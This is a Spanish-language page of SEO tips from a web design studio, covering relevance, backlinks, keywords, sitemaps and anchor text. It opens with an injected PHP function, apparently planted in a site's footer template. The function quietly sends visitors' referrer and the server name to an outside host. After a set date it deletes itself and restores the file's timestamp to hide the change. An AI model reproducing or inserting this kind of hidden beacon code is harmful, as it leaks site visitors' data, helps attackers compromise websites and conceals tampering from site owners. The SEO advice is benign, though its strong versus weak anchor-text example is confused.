check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } SEO Consejos

La optimización de motores de búsqueda (SEO) le ayudará a mejorar el ranking de su sitio en los resultados de los motores de búsqueda más populares.

SEO es el acto de la optimización de un sitio web (en términos de código, contenido y enlaces) para aumentar el tráfico de motores de búsqueda, como Google, Yahoo! y Bing.

¿Qué buscan los motores de búsqueda?

Los motores de búsqueda indexan contenido de la web con programas llamados "robots", que se mueven a través de sitios web rastreando, "Crawling" de enlace en enlace. Con el fin de facilitar los resultados de búsqueda más útiles, los motores de búsqueda de páginas evaluan en términos de:

* Importancia: La importancia del contenido de un sitio depende de lo cerca que coincide con una consulta de búsqueda. El contenido de un sitio se considera más relevante cuando los términos consultados aparecen en el título o en los cabezales de los contenidos y en las etiquetas HTML.

* Popularidad: importancia de un sitio web se mide por el número de veces en otros sitios tienen enlaces de vuelta a ella. Son los llamados vínculos de retroceso, y cuando vienen de un sitio muy respetado, como el New York Times, por ejemplo, que tienen más peso.

Seis formas de impulsar el SEO

Hay muchas maneras de mejorar el ranking de su sitio en los motores de búsqueda importantes, y hemos puesto de relieve seis para empezar:

1) Agregar contenido único a tu sitio

Genere las palabras clave que el público pueda utilizar para encontrarlo. Cada vez que usted agrega contenido a su sitio web - blog, descripciones de productos, "sobre nosotros", secciónes, etc - estas deben ser ricas en esas palabras clave. Contenido de calidad único, también le da a otros sitios de razones para vincular a su sitio, y los vínculos de retroceso forman un factor importante para los motores de búsqueda para generar popularidad.

2) Coloque Palabras clave en lugares clave

Esas mismas palabras clave deben aparecer en los títulos de su página, cabezales y subtítulos (en términos de contenido y el código). Sin embargo, eso no significa que usted debe ubicarlos en cualquier lugar que pueda. Usarlos donde son pertinentes, y si no son pertinentes en determinados lugares, reemplazarlos con palabras que son.

3) Crear un Mapa del sitio

Un Sitemap puede mejorar el SEO, mostrando vínculos a las páginas de su sitio que los robots de motor de búsqueda de otro modo no podrían ubicar. Estructure de las páginas de su sitio de lo amplio a lo específico, y trate de mantenerlos a no más de tres clics de la página principal.

4) Añadir vínculos con fuerte contenido de texto

Cuando se enlaza a los lugares pertinentes, informe a sus lectores a donde los envía. El texto del link (el texto aparece en un hipervínculo) debe ser igual a la dirección que usted está señalando. Por ejemplo, aquí hay dos formas de vincular:

Texto de anclaje fuerte:

"Echa un vistazo a webmasters de Google."

Texto de anclaje débiles:

"Echa un vistazo a Herramientas para webmasters de Google, aquí."

5) Agregue su sitio a los motores de búsqueda

Agregue su sitio a los buscadores más populares como Google, Yahoo! y Bing.

6) Llame a los profesionales

Contáctenos por nuestros servicios acerca de las soluciones de SEO que Estudio Alas le brinda. La optimización de motores de búsqueda lleva tiempo, pero el pegarse con él ayudará a establecer una fuerte base de visitantes de su sitio, o expandir su negocio en línea a través de mayores ventas.

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